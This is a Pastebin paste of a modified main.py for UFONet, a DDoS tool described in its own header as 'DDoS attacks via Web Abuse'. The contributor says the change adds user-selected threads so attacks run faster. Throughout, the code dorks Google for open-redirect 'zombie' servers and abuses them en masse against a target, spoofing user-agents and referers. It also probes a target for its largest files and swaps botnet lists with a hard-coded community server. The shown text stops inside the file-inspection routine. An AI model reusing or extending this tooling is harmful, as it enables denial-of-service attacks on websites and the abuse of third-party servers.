PH1K3

Ufonet with threads by PH1K3

May 3rd, 2015
1,486
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Yo epsylon!
  2. this is what i meant by adding threads to you programm to make it work faster.
  3. i only changed the code in the main.py file :
  4.  
  5. #!/usr/bin/env python
  6. # -*- coding: utf-8 -*-"
  7. """
  8. UFONet - DDoS attacks via Web Abuse - 2013/2014 - by psy (epsylon@riseup.net)
  9.  
  10. You should have received a copy of the GNU General Public License along
  11. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  12. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA ,contributed by PH1K3
  13. """
  14. import os, sys, re, traceback, random, time
  15. import pycurl, StringIO, urllib, urllib2, cgi
  16. from urlparse import urlparse
  17. from random import randrange, shuffle
  18. from options import UFONetOptions
  19. from update import Updater
  20. from threading import Thread
  21.  
  22. DEBUG = 0
  23.  
  24. howmanythreadsdouwant=raw_input("How many threads do you wish to attack with? :  ")
  25.  
  26. num_threads = howmanythreadsdouwant
  27.  
  28. class RandomIP(object):
  29.     """
  30.    Class to generate random valid IP's
  31.    """
  32.     def _generateip(self, string):
  33.         notvalid = [10, 127, 169, 172, 192]
  34.         first = randrange(1, 256)
  35.         while first is notvalid:
  36.             first = randrange(1, 256)
  37.         _ip = ".".join([str(first), str(randrange(1, 256)),
  38.         str(randrange(1, 256)), str(randrange(1, 256))])
  39.         return _ip
  40.  
  41. class UFONet(object):
  42.     def __init__(self):
  43.         self.agents = []
  44.         self.agents.append('Mozilla/5.0 (iPhone; U; CPU iOS 2_0 like Mac OS X; en-us)')
  45.         self.agents.append('Mozilla/5.0 (Linux; U; Android 0.5; en-us)')
  46.         self.agents.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)')
  47.         self.agents.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
  48.         self.agents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13')
  49.         self.agents.append('Opera/9.25 (Windows NT 6.0; U; en)')
  50.         self.agents.append('Mozilla/2.02E (Win95; U)')
  51.         self.agents.append('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')
  52.         self.agents.append('Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)')
  53.         self.agents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)')
  54.         self.agents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)')
  55.         self.agents.append('(Privoxy/1.0)')
  56.     self.agents.append('Googlebot')
  57.     self.agents.append('Bingbot')
  58.         self.agents.append('CERN-LineMode/2.15')
  59.         self.agents.append('cg-eye interactive')
  60.         self.agents.append('China Local Browser 2.6')
  61.         self.agents.append('ClariaBot/1.0')
  62.         self.agents.append('Comos/0.9_(robot@xyleme.com)')
  63.         self.agents.append('Crawler@alexa.com')
  64.         self.agents.append('DonutP; Windows98SE')
  65.         self.agents.append('Dr.Web (R) online scanner: http://online.drweb.com/')
  66.         self.agents.append('Dragonfly File Reader')
  67.         self.agents.append('Eurobot/1.0 (http://www.ayell.eu)')
  68.         self.agents.append('FARK.com link verifier')
  69.         self.agents.append('FavIconizer')
  70.         self.agents.append('Feliz - Mixcat Crawler (+http://mixcat.com)')
  71.         self.agents.append('TwitterBot (http://www.twitter.com)')
  72.         self.user_agent = random.choice(self.agents).strip()
  73.  
  74.         self.referer = 'http://127.0.0.1/'
  75.         self.head = False
  76.         self.payload = False
  77.         self.external = False
  78.         self.attack_mode = False
  79.         self.retries = ''
  80.         self.delay = ''
  81.         self.connection_failed = False
  82.         self.total_possible_zombies = 0
  83.  
  84.     def set_options(self, options):
  85.         self.options = options
  86.  
  87.     def create_options(self, args=None):
  88.         self.optionParser = UFONetOptions()
  89.         self.options = self.optionParser.get_options(args)
  90.         if not self.options:
  91.             return False
  92.         return self.options
  93.  
  94.     def banner(self):
  95.         print '='*75, "\n"
  96.         print "888     888 8888888888 .d88888b.  888b    888          888    "  
  97.         print "888     888 888        d88P" "Y888b  8888b   888          888    "
  98.         print "888     888 888       888     888 88888b  888          888    "
  99.         print "888     888 8888888   888     888 888Y88b 888  .d88b.  888888 "
  100.         print "888     888 888       888     888 888 Y88b888 d8P  Y8b 888    "
  101.         print "888     888 888       888     888 888  Y88888 88888888 888    "
  102.         print "Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b.  "
  103.         print " 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888"      
  104.         print self.optionParser.description, "\n"
  105.         print '='*75
  106.  
  107.     def try_running(self, func, error, args=None):
  108.         options = self.options
  109.         args = args or []
  110.         try:
  111.             return func(*args)
  112.         except Exception as e:
  113.             print(error, "error")
  114.             if DEBUG:
  115.                 traceback.print_exc()
  116.  
  117.     def run(self, opts=None):
  118.         if opts:
  119.             options = self.create_options(opts)
  120.             self.set_options(options)
  121.         options = self.options
  122.  
  123.         # check proxy options
  124.         proxy = options.proxy
  125.         if options.proxy:
  126.             try:
  127.                 pattern = 'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
  128.                 m = re.search(pattern, proxy)
  129.                 if m is None:
  130.                     self.banner()
  131.                     print ("\n[Error] - Proxy malformed!\n")
  132.                     return #sys.exit(2)
  133.             except Exception:
  134.                 self.banner()
  135.                 print ("\n[Error] - Proxy malformed!\n")
  136.                 return #sys.exit(2)
  137.  
  138.         # check tor connection
  139.         if options.checktor:
  140.             self.banner()
  141.             try:
  142.                 print("\nSending request to: https://check.torproject.org\n")
  143.                 tor_reply = urllib2.urlopen("https://check.torproject.org").read()
  144.                 your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip()
  145.                 if not tor_reply or 'Congratulations' not in tor_reply:
  146.                     print("It seems that Tor is not properly set.\n")
  147.                     print("Your IP address appears to be: " + your_ip + "\n")
  148.                 else:
  149.                     print("Congratulations!. Tor is properly being used :-)\n")
  150.                     print("Your IP address appears to be: " + your_ip + "\n")
  151.             except:
  152.                 print("Cannot reach TOR checker system!. Are you correctly connected?\n")
  153.  
  154.         # search for 'zombies' on google results
  155.         if options.search:
  156.             try:
  157.                 self.banner()
  158.                 print("\nSearching for 'zombies' on google results. Good Luck ;-)\n")
  159.                 print '='*22 + '\n'
  160.                 zombies = self.search_zombies(dork='')
  161.                 if zombies == None:
  162.                     check_url_link_reply = "N"
  163.                     pass
  164.                 else:
  165.                     if not self.options.forceyes:
  166.                         check_url_link_reply = raw_input("Wanna check if they are valid zombies? (Y/n)\n")
  167.                     else:
  168.                         check_url_link_reply = "Y"
  169.                 if check_url_link_reply == "n" or check_url_link_reply == "N":
  170.                     print "\nBye!\n"
  171.                 else:
  172.                     test = self.testing(zombies)
  173.             except Exception:
  174.                 print ("[Error] - Something wrong searching!\n")
  175.  
  176.         # search for 'zombies' from a list of 'dorks'
  177.         if options.dorks:
  178.             try:
  179.                 self.banner()
  180.                 print("\nSearching for 'zombies' on google results (from a list of 'dorks'). Good Luck ;-)\n")
  181.                 dorks = self.extract_dorks()
  182.                 zombies = []
  183.                 for dork in dorks:
  184.                     print '='*22
  185.                     print "Dork:", dork
  186.                     print '='*22 + '\n'
  187.                     dorked_zombies = self.search_zombies(dork)
  188.                     for zombie in dorked_zombies:
  189.                         zombies.append(zombie)
  190.                 print '='*44
  191.                 print '=Total Possible Zombies:', str(self.total_possible_zombies)
  192.                 print '='*44 + '\n'
  193.                 if str(self.total_possible_zombies) == '0':
  194.                     print "Not any victim(s) found... Bye!\n"
  195.                     return #sys.exit(2)
  196.                 if not self.options.forceyes:
  197.                     check_url_link_reply = raw_input("Wanna check if they are valid zombies? (Y/n)\n")
  198.                     print '-'*25
  199.                 else:
  200.                     check_url_link_reply = "Y"
  201.                 if check_url_link_reply == "n" or check_url_link_reply == "N":
  202.                     print "\nBye!\n"
  203.                 else:
  204.                     test = self.testing(zombies)
  205.             except Exception:
  206.                 print ("[Error] - Something wrong searching!\n")
  207.  
  208.         # test web 'zombie' servers -> show statistics
  209.         if options.test:
  210.             try:
  211.                 self.banner()
  212.                 zombies = self.extract_zombies()
  213.                 test = self.testing(zombies)
  214.             except Exception:
  215.                 print ("\n[Error] - Something wrong testing!\n")
  216.  
  217.         # attack target -> exploit Open Redirect massively and connect all vulnerable servers to a target
  218.         if options.target:
  219.             try:
  220.                 self.banner()
  221.                 zombies = self.extract_zombies()
  222.                 attack = self.attacking(zombies)
  223.             except Exception:
  224.                 print ("\n[Error] - Something wrong attacking!\n")
  225.  
  226.         # inspect target -> inspect target's components sizes
  227.         if options.inspect:
  228.             try:
  229.                 self.banner()
  230.                 print("\nInspecting target's component sizes to search for better places to 'bit'... Grrr!\n")
  231.                 print '='*22 + '\n'
  232.                 inspection = self.inspecting()
  233.             except Exception, e:
  234.                 print ("[Error] - Something wrong inspecting... Not any object found!\n")
  235.                 return #sys.exit(2)
  236.  
  237. #        # crawl target -> crawl target's places
  238. #        if options.crawl:
  239. #            try:
  240. #                self.banner()
  241. #                print("\nCrawlering target's links to discover web structure...\n")
  242. #                print '='*22 + '\n'
  243. #                crawler = self.crawlering()
  244. #            except Exception, e:
  245. #                print ("[Error] - Something wrong crawlering!\n")
  246. #                return #sys.exit(2)
  247.  
  248.         # check/update for latest stable version
  249.         if options.update:
  250.             self.banner()
  251.             try:
  252.                 print("\nTrying to update automatically to the latest stable version\n")
  253.                 Updater()
  254.             except:
  255.                 print("\nSomething was wrong!. You should checkout UFONet manually with:\n")
  256.                 print("$ git clone https://github.com/epsylon/ufonet\n")
  257.  
  258.         # launch GUI/Web interface
  259.         if options.web:
  260.             self.create_web_interface()
  261.             return
  262.  
  263.         # download list of 'zombies' from Community
  264.         if options.download:
  265.             try:
  266.                 self.banner()
  267.                 print("\nDownloading list of 'zombies' from Community...\n")
  268.                 print '='*22 + '\n'
  269.                 download_list = self.downloading_list()
  270.             except Exception, e:
  271.                 print ("[Error] - Something wrong downloading!\n")
  272.                 return #sys.exit(2)
  273.  
  274.         # upload list of 'zombies' to Community
  275.         if options.upload:
  276.             try:
  277.                 self.banner()
  278.                 print("\nUploading list of 'zombies' to Community...\n")
  279.                 print '='*22 + '\n'
  280.                 upload_list = self.uploading_list()
  281.             except Exception, e:
  282.                 print ("[Error] - Something wrong uploading!\n")
  283.                 return #sys.exit(2)
  284.  
  285.     def uploading_list(self):
  286.         import gzip
  287.         abductions = "abductions.txt.gz"
  288.         try:
  289.             print("Checking integrity of Mirror: Turina Server\n")
  290.             urllib.urlretrieve('http://176.28.23.46/ufonet/abductions.txt.gz', # Turina
  291.                        abductions)
  292.             print("Mirror: IS UP!")
  293.             f_in = gzip.open(abductions, 'rb')
  294.             f_out = open('abductions.txt', 'wb')
  295.             f_out.write(f_in.read())
  296.             f_in.close()
  297.             f_out.close()
  298.             os.remove(abductions) # remove .gz file
  299.             num_zombies = 0
  300.             with open('abductions.txt') as f:
  301.                 for _ in f:
  302.                     num_zombies = num_zombies + 1
  303.             print("\n[INFO] - Number of 'zombies' on Mirror: "+ str(num_zombies))
  304.             print '-'*12 + '\n'
  305.             if not self.options.forceyes:
  306.                 update_reply = raw_input("Wanna merge ONLY new 'zombies' to Community Army (Y/n)")
  307.                 print '-'*25
  308.             else:
  309.                 update_reply = "Y"
  310.             if update_reply == "n" or update_reply == "N":
  311.                 os.remove('abductions.txt') # remove .txt file
  312.                 print "\n[INFO] - Aborting upload process and cleaning temporal files. Bye!\n"
  313.                 return
  314.             else:
  315.                 print "\n[INFO] - Checking integrity of your list of 'zombies'. Starting test!\n" # only upload valid zombies
  316.                 print '='*35
  317.                 zombies = self.extract_zombies()
  318.                 test = self.testing(zombies)
  319.                 zombies_community = []
  320.                 zombies_added = 0
  321.                 f = open('abductions.txt')
  322.                 abductions = f.readlines()
  323.                 abductions = [abduction.strip() for abduction in abductions]
  324.                 f.close()
  325.                 fz = open("zombies.txt")
  326.                 zombies = fz.readlines()
  327.                 zombies = [zombie.strip() for zombie in zombies]
  328.                 fz.close()
  329.                 for zombie in zombies:
  330.                     if zombie not in abductions:
  331.                         zombies_community.append(zombie)
  332.                         zombies_added = zombies_added + 1
  333.                     else:
  334.                         pass
  335.                 #print zombies_community
  336.                 print '-'*12 + '\n'
  337.                 print("[INFO] - Number of new 'zombies' to be added: " + str(zombies_added) + '\n')
  338.                 print '-'*12 + '\n'
  339.                 if zombies_added == 0:
  340.                     os.remove('abductions.txt') # remove .txt file
  341.                     print("[INFO] - Hehehe.. You should try to search for new 'zombies'. These are already in the Community. ;-)\n")
  342.                     return
  343.                 else:
  344.                     for zombie in zombies_community:
  345.                         fc = gzip.open('community.txt.gz', 'wb')
  346.                         fc.write(zombie)
  347.                     os.remove('abductions.txt') # remove .txt file
  348.                     fc.close()
  349.                     print("[INFO] - Starting to upload new 'zombies'...\n")
  350.                     try: # open a socket and send data to ufonet_community reciever
  351.                         import socket
  352.                         host = '176.28.23.46' # Turina
  353.                         cport = 9991
  354.                         mport = 9990
  355.                         try:
  356.                             cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  357.                             cs.connect((host, cport))
  358.                             cs.send("SEND " + 'community.txt.gz')
  359.                             cs.close()
  360.                             time.sleep(2)
  361.                             ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  362.                             ms.connect((host, mport))
  363.                             f = open('community.txt.gz', "rb")
  364.                             data = f.read()
  365.                             f.close()
  366.                             ms.send(data)
  367.                             ms.close()
  368.                             os.remove('community.txt.gz') # remove local .gz file after transfer
  369.                             print '-'*12 + '\n'
  370.                             print("[INFO] - Transfer: DONE!. Thanks for your contribution ;-)\n")
  371.                         except Exception, e:
  372.                             print e + "\n"
  373.                     except:
  374.                         print '-'*12 + '\n'
  375.                         print("[Error] - Connecting sockets to the different Mirrors. Aborting!\n")
  376.                         return
  377.         except:
  378.             print '-'*12 + '\n'
  379.             print("[Error] - Unable to upload list of 'zombies' to Community Servers. ;(\n")
  380.             return #sys.exit(2)
  381.  
  382.     def downloading_list(self): # add your mirror to protect zombies list
  383.         import urllib, gzip
  384.         abductions = "abductions.txt.gz"
  385.         try:
  386.             print("Trying Mirror: Turina Server\n")
  387.             urllib.urlretrieve('http://176.28.23.46/ufonet/abductions.txt.gz',
  388.                        abductions)
  389.             print("Mirror: IS UP!")
  390.         except:
  391.             print("Mirror: FAILED!")
  392.             print '-'*12 + '\n'
  393.             print("[Error] - Unable to download list of 'zombies' from Community Servers. ;(\n")
  394.             return #sys.exit(2)
  395.         print '-'*12 + '\n'
  396.         f_in = gzip.open(abductions, 'rb')
  397.         f_out = open('abductions.txt', 'wb')
  398.         f_out.write(f_in.read())
  399.         f_in.close()
  400.         f_out.close()
  401.         os.remove(abductions) # remove .gz file
  402.         num_zombies = 0
  403.         with open('abductions.txt') as f:
  404.             for _ in f:
  405.                 num_zombies = num_zombies + 1
  406.         print("[INFO] - Congratulations!. Total of 'zombies' downloaded: " + str(num_zombies))
  407.         print '-'*12
  408.         if not self.options.forceyes:
  409.             update_reply = raw_input("\nWanna merge ONLY new 'zombies' to your army (Y/n)")
  410.             print '-'*25
  411.         else:
  412.             update_reply = "Y"
  413.         if update_reply == "n" or update_reply == "N":
  414.             os.remove('abductions.txt') # remove .txt file
  415.             print "\n[INFO] - List downloaded has been removed. Bye!\n"
  416.         else:
  417.             zombies_ready = []
  418.             f = open('abductions.txt')
  419.             abductions = f.readlines()
  420.             f.close()
  421.             fz = open("zombies.txt")
  422.             zombies = fz.readlines()
  423.             fz.close()
  424.             for abduction in abductions:
  425.                 abduction = abduction.replace('\n','')
  426.                 if abduction not in zombies:
  427.                     zombies_ready.append(abduction)
  428.                 else:
  429.                     pass
  430.             self.update_zombies(zombies_ready)
  431.             os.remove('abductions.txt') # remove .txt file
  432.             print "\n[INFO] - Botnet updated! ;-)\n"
  433.  
  434.     def create_web_interface(self):
  435.         # launch webserver+gui
  436.         from webgui import ClientThread
  437.         import webbrowser, socket
  438.         host = '0.0.0.0'
  439.         port = 9999
  440.         try:
  441.             webbrowser.open('http://127.0.0.1:9999', new=1)
  442.             tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  443.         tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  444.         tcpsock.bind((host,port))
  445.         while True:
  446.             tcpsock.listen(4)
  447.             #print "Listening for incoming connections on http://%s:%d" % (host,port)
  448.             (clientsock, (ip, port)) = tcpsock.accept()
  449.             newthread = ClientThread(ip, port, clientsock)
  450.                 newthread.start()
  451.         except (KeyboardInterrupt, SystemExit):
  452.             sys.exit()
  453.  
  454. #    def crawlering(self):
  455. #        # crawl target's links to discover web structure          
  456. #        options = self.options
  457. #        myurl = options.crawl
  458. #        for i in re.findall('''href=["'](.[^"']+)["']''', urllib.urlopen(myurl).read(), re.I):
  459. #            print i
  460.  
  461.     def inspecting(self):
  462.         # inspect HTML target's components sizes (ex: http://target.com/foo)          
  463.         # [images, .mov, .webm, .avi, .swf, .mpg, .mpeg, .mp3, .ogg, .ogv,
  464.         # .wmv, .css, .js, .xml, .php, .html, .jsp, .asp, .txt]
  465.         options = self.options
  466.         biggest_files = {}
  467.         try:
  468.             target = str(options.inspect)
  469.             if target.endswith(""):
  470.                 target.replace("", "/")
  471.             headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  472.             try:
  473.                 if target.startswith('https'): # replacing https request method (unsecure)
  474.                     print "[WARNING!] - Inspection doesn't support https connections"
  475.                     if not self.options.forceyes:
  476.                         inspection_reply = raw_input("\nWanna follow using http (non encrypted) (Y/n)")
  477.                     else:
  478.                         inspection_reply = "Y"
  479.                     if inspection_reply == "Y" or inspection_reply == "y":
  480.                         print '\n' + '='*22 + '\n'
  481.                         target = target.replace('https', 'http')
  482.                     else:
  483.                         print "\nBye!\n"
  484.                         return
  485.                 if target.startswith("http://"):
  486.                     req = urllib2.Request(target, None, headers)
  487.                     target_reply = urllib2.urlopen(req).read()
  488.                 else:
  489.                     print "[Error] - Target url not valid!\n"
  490.                     return #sys.exit(2)
  491.             except:
  492.                 print('[Error] - Unable to connect to target\n')
  493.                 return #sys.exit(2)
  494.         except:
  495.             print '\n[Error] - Cannot found any object', "\n"
  496.             return #sys.exit(2)
  497.         #print target_reply
  498.         try: # search for image files
  499.             regex_img = []
  500.             regex_img1 = "<img src='(.+?)'" # search on target's results using regex with simple quotation
  501.             regex_img.append(regex_img1)
  502.             regex_img2 = '<img src="(.+?)"' # search on target's results using regex with double quotation
  503.             regex_img.append(regex_img2)
  504.             #regex_img3 = '<img src=(.+?)>' # search on target's results using regex without quotations
  505.             #regex_img.append(regex_img3)
  506.             for regimg in regex_img:
  507.                 pattern_img = re.compile(regimg)
  508.                 img_links = re.findall(pattern_img, target_reply)
  509.             imgs = {}
  510.             for img in img_links:
  511.                 print('+Image found: ' + img)
  512.                 try:
  513.                     if img.startswith('http'):
  514.                         img_file = urllib.urlopen(img)
  515.                     else:
  516.                         target_host = urlparse(options.inspect)
  517.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  518.                         if not target_url.endswith('/'): # add "/" to end of target
  519.                             target_url = target_url + "/"
  520.                         img_file = urllib.urlopen(target_url + img)
  521.                     size = img_file.headers.get("content-length")
  522.                     if size is None: # grab data with len if content-lenght is not available on headers
  523.                         size = len(img_file.read())
  524.                 except:
  525.                     print('[Error] - Unable to retrieve info from Image)')
  526.                     size = 0
  527.                 imgs[img] = int(size)
  528.                 print('(Size: ' + str(size) + ' Bytes)')
  529.                 print '-'*12
  530.             #print imgs
  531.             biggest_image = max(imgs.keys(), key=lambda x: imgs[x]) # search/extract biggest image value from dict
  532.             biggest_files[biggest_image] = imgs[biggest_image] # add biggest image to list
  533.         except: # if not any image found, go for next
  534.             pass
  535.         try: # search for .mov files
  536.             regex_mov = []
  537.             regex_mov1 = "<a href='(.+?.mov)'" # search on target's results using regex with simple quotation
  538.             regex_mov.append(regex_mov1)
  539.             regex_mov2 = '<a href="(.+?.mov)"' # search on target's results using regex with double quotation
  540.             regex_mov.append(regex_mov2)
  541.             #regex_mov3 = '<a href=(.+?.mov)' # search on target's results using regex without quotations
  542.             #regex_mov.append(regex_mov3)
  543.             for regmov in regex_mov:
  544.                 pattern_mov = re.compile(regmov)
  545.                 mov_links = re.findall(pattern_mov, target_reply)
  546.             movs = {}
  547.             for mov in mov_links:
  548.                 print('+Video (.mov) found: ' + mov)
  549.                 try:
  550.                     if mov.startswith('http'):
  551.                         mov_file = urllib.urlopen(mov)
  552.                     else:
  553.                         target_host = urlparse(options.inspect)
  554.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  555.                         if not target_url.endswith('/'): # add "/" to end of target
  556.                             target_url = target_url + "/"
  557.                         mov_file = urllib.urlopen(target_url + mov)
  558.                     size = mov_file.headers.get("content-length")
  559.                     if size is None: # grab data with len if content-lenght is not available on headers
  560.                         size = len(mov_file.read())
  561.                 except:
  562.                     print('[Error] - Unable to retrieve info from Video)')
  563.                     size = 0
  564.                 movs[mov] = int(size)
  565.                 print('(Size: ' + str(size) + ' Bytes)')
  566.                 print '-'*12
  567.             #print movs
  568.             biggest_mov = max(movs.keys(), key=lambda x: movs[x]) # search/extract biggest video (.mov) value from dict
  569.             biggest_files[biggest_mov] = movs[biggest_mov] # add biggest video (.mov) to list
  570.         except: # if not any .mov found, go for next
  571.             pass
  572.         try: # search for .webm files
  573.             regex_webm = []
  574.             regex_webm1 = "<a href='(.+?.webm)'" # search on target's results using regex with simple quotation
  575.             regex_webm.append(regex_webm1)
  576.             regex_webm2 = '<a href="(.+?.webm)"' # search on target's results using regex with double quotation
  577.             regex_webm.append(regex_webm2)
  578.             #regex_webm3 = '<a href=(.+?.webm)' # search on target's results using regex without quotations
  579.             #regex_webm.append(regex_webm3)
  580.             for regwebm in regex_webm:
  581.                 pattern_webm = re.compile(regwebm)
  582.                 webm_links = re.findall(pattern_webm, target_reply)
  583.             webms = {}
  584.             for webm in webm_links:
  585.                 print('+Video (.webm) found: ' + webm)
  586.                 try:
  587.                     if webm.startswith('http'):
  588.                         webm_file = urllib.urlopen(webm)
  589.                     else:
  590.                         target_host = urlparse(options.inspect)
  591.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  592.                         if not target_url.endswith('/'): # add "/" to end of target
  593.                             target_url = target_url + "/"
  594.                         webm_file = urllib.urlopen(target_url + webm)
  595.                     size = webm_file.headers.get("content-length")
  596.                     if size is None: # grab data with len if content-lenght is not available on headers
  597.                         size = len(webm_file.read())
  598.                 except:
  599.                     print('[Error] - Unable to retrieve info from Video)')
  600.                     size = 0
  601.                 webms[webm] = int(size)
  602.                 print('(Size: ' + str(size) + ' Bytes)')
  603.                 print '-'*12
  604.             #print webms
  605.             biggest_webm = max(webms.keys(), key=lambda x: webms[x]) # search/extract biggest video (.webm) value from dict
  606.             biggest_files[biggest_webm] = webms[biggest_webm] # add biggest video (.webm) to list
  607.         except: # if not any .webm found, go for next
  608.             pass
  609.         try: # search for .avi files
  610.             regex_avi = []
  611.             regex_avi1 = "<a href='(.+?.avi)'" # search on target's results using regex with simple quotation
  612.             regex_avi.append(regex_avi1)
  613.             regex_avi2 = '<a href="(.+?.avi)"' # search on target's results using regex with double quotation
  614.             regex_avi.append(regex_avi2)
  615.             #regex_avi3 = '<a href=(.+?.avi)' # search on target's results using regex without quotations
  616.             #regex_avi.append(regex_avi3)
  617.             for regavi in regex_avi:
  618.                 pattern_avi = re.compile(regavi)
  619.                 avi_links = re.findall(pattern_avi, target_reply)
  620.             avis = {}
  621.             for avi in avi_links:
  622.                 print('+Video (.avi) found: ' + avi)
  623.                 try:
  624.                     if avi.startswith('http'):
  625.                         avi_file = urllib.urlopen(avi)
  626.                     else:
  627.                         target_host = urlparse(options.inspect)
  628.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  629.                         if not target_url.endswith('/'): # add "/" to end of target
  630.                             target_url = target_url + "/"
  631.                         avi_file = urllib.urlopen(target_url + avi)
  632.                     size = avi_file.headers.get("content-length")
  633.                     if size is None: # grab data with len if content-lenght is not available on headers
  634.                         size = len(avi_file.read())
  635.                 except:
  636.                     print('[Error] - Unable to retrieve info from Video)')
  637.                     size = 0
  638.                 avis[avi] = int(size)
  639.                 print('(Size: ' + str(size) + ' Bytes)')
  640.                 print '-'*12
  641.             #print avis
  642.             biggest_avi = max(avis.keys(), key=lambda x: avis[x]) # search/extract biggest video (.avi) value from dict
  643.             biggest_files[biggest_avi] = avis[biggest_avi] # add biggest video (.avi) to list
  644.         except: # if not any .avi found, go for next
  645.             pass
  646.         try: # search for .swf files
  647.             regex_swf = []
  648.             regex_swf1 = "<value='(.+?.swf)'" # search on target's results using regex with simple quotation
  649.             regex_swf.append(regex_swf1)
  650.             regex_swf2 = '<value="(.+?.swf)"' # search on target's results using regex with double quotation
  651.             regex_swf.append(regex_swf2)
  652.             #regex_swf3 = '<value=(.+?.swf)' # search on target's results using regex without quotations
  653.             #regex_swf.append(regex_swf3)
  654.             for regswf in regex_swf:
  655.                 pattern_swf = re.compile(regswf)
  656.                 swf_links = re.findall(pattern_swf, target_reply)
  657.             swfs = {}
  658.             for swf in swf_links:
  659.                 print('+Flash (.swf) found: ' + swf)
  660.                 try:
  661.                     if swf.startswith('http'):
  662.                         swf_file = urllib.urlopen(swf)
  663.                     else:
  664.                         target_host = urlparse(options.inspect)
  665.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  666.                         if not target_url.endswith('/'): # add "/" to end of target
  667.                             target_url = target_url + "/"
  668.                         swf_file = urllib.urlopen(target_url + swf)
  669.                     size = swf_file.headers.get("content-length")
  670.                     if size is None: # grab data with len if content-lenght is not available on headers
  671.                         size = len(swf_file.read())
  672.                 except:
  673.                     print('[Error] - Unable to retrieve info from Flash)')
  674.                     size = 0
  675.                 swfs[swf] = int(size)
  676.                 print('(Size: ' + str(size) + ' Bytes)')
  677.                 print '-'*12
  678.             #print swfs
  679.             biggest_swf = max(swfs.keys(), key=lambda x: swfs[x]) # search/extract biggest flash (.swf) value from dict
  680.             biggest_files[biggest_swf] = swfs[biggest_swf] # add biggest flash (.swf) to list
  681.         except: # if not any .swf found, go for next
  682.             pass
  683.         try: # search for .mpg files
  684.             regex_mpg = []
  685.             regex_mpg1 = "<src='(.+?.mpg)'" # search on target's results using regex with simple quotation
  686.             regex_mpg.append(regex_mpg1)
  687.             regex_mpg2 = '<src="(.+?.mpg)"' # search on target's results using regex with double quotation
  688.             regex_mpg.append(regex_mpg2)
  689.             #regex_mpg3 = '<src=(.+?.mpg)' # search on target's results using regex without quotations
  690.             #regex_mpg.append(regex_mpg3)
  691.             for regmpg in regex_mpg:
  692.                 pattern_mpg = re.compile(regmpg)
  693.                 mpg_links = re.findall(pattern_mpg, target_reply)
  694.             mpgs = {}
  695.             for mpg in mpg_links:
  696.                 print('+Video (.mpg) found: ' + mpg)
  697.                 try:
  698.                     if mpg.startswith('http'):
  699.                         mpg_file = urllib.urlopen(mpg)
  700.                     else:
  701.                         target_host = urlparse(options.inspect)
  702.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  703.                         if not target_url.endswith('/'): # add "/" to end of target
  704.                             target_url = target_url + "/"
  705.                         mpg_file = urllib.urlopen(target_url + mpg)
  706.                     size = mpg_file.headers.get("content-length")
  707.                     if size is None: # grab data with len if content-lenght is not available on headers
  708.                         size = len(mpg_file.read())
  709.                 except:
  710.                     print('[Error] - Unable to retrieve info from Video)')
  711.                     size = 0
  712.                 mpgs[mpg] = int(size)
  713.                 print('(Size: ' + str(size) + ' Bytes)')
  714.                 print '-'*12
  715.             #print mpgs
  716.             biggest_mpg = max(mpgs.keys(), key=lambda x: mpgs[x]) # search/extract biggest video (.mpg) value from dict
  717.             biggest_files[biggest_mpg] = mpgs[biggest_mpg] # add biggest video (.mpg) to list
  718.         except: # if not any .mpg found, go for next
  719.             pass
  720.         try: # search for .mpeg files
  721.             regex_mpeg = []
  722.             regex_mpeg1 = "<src='(.+?.mpeg)'" # search on target's results using regex with simple quotation
  723.             regex_mpeg.append(regex_mpeg1)
  724.             regex_mpeg2 = '<src="(.+?.mpeg)"' # search on target's results using regex with double quotation
  725.             regex_mpeg.append(regex_mpeg2)
  726.             #regex_mpeg3 = '<src=(.+?.mpeg)' # search on target's results using regex without quotations
  727.             #regex_mpeg.append(regex_mpeg3)
  728.             for regmpeg in regex_mpeg:
  729.                 pattern_mpeg = re.compile(regmpeg)
  730.                 mpeg_links = re.findall(pattern_mpeg, target_reply)
  731.             mpegs = {}
  732.             for mpeg in mpeg_links:
  733.                 print('+Video (.mpeg) found: ' + mpeg)
  734.                 try:
  735.                     if mpeg.startswith('http'):
  736.                         mpeg_file = urllib.urlopen(mpeg)
  737.                     else:
  738.                         target_host = urlparse(options.inspect)
  739.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  740.                         if not target_url.endswith('/'): # add "/" to end of target
  741.                             target_url = target_url + "/"
  742.                         mpeg_file = urllib.urlopen(target_url + mpeg)
  743.                     size = mpeg_file.headers.get("content-length")
  744.                     if size is None: # grab data with len if content-lenght is not available on headers
  745.                         size = len(mpeg_file.read())
  746.                 except:
  747.                     print('[Error] - Unable to retrieve info from Video)')
  748.                     size = 0
